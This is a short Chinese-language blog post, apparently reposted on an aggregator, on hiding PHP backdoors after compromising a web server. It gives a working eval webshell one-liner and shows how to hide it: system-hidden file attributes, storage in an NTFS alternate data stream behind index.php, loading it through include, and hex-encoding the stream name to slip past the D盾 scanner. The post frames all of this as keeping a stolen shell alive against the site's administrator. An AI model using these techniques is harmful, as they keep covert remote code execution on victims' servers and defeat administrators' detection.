php後門隱藏技巧
阿新 • • 發佈:2018-06-24
info index.php 文件名 理解 include data color 找不到 創建
Part 1 前言
辛辛苦苦拿下的shell,幾天沒看,管理員給刪了。
Part 2 隱藏
隱藏的技巧很多,廢話不多說直接開始。
一. attrib +s +h
創建系統隱藏文件。
attrib +s +a +r +h / attrib +s +h 文件名
查看隱藏文件
二. 利用ADS隱藏文件
NTFS交換數據流(Alternate Data Streams,簡稱ADS)是NTFS磁盤格式的一個特性,在NTFS文件系統下,每個文件都可以存在多個數據流。通俗的理解,就是其它文件可以“寄宿”在某個文件身上,而在資源管理器中卻只能看到宿主文件,找不到寄宿文件。利用ADS數據流,我們可以做很多有趣的事情。(抄的)
1.首先創建ADS隱藏文件
在命令行,echo一個數據流進去,比如index文件是正常文件。
echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg
這樣就生成了一個不可見的 index.php:shell.jpg
可用 dir /r 命令來查看
修改與刪除
修改:
進入文件所在目錄,notepad index.php:shell.jpg
如何刪除index.php:shell.jpg呢?
直接刪除index.php
2. 文件包含
我們生成了index.php:shell.jpg,可以通過包含文件的方式來使用。
<?php include(‘index.php:shell.jpg‘)?>
還可以用上面學的隱藏include.php
3. 免殺
隱藏了也不行兄dei,D盾一掃瞬間爆炸。
把 index.php:shell.jpg hex編碼
<?php $a="696E6465782E7068703A7368656C6C2E6A7067"; // index.php:shell.jpg hex編碼 $b="a"; include(PACK(‘H*‘,$$b)) ?>
php後門隱藏技巧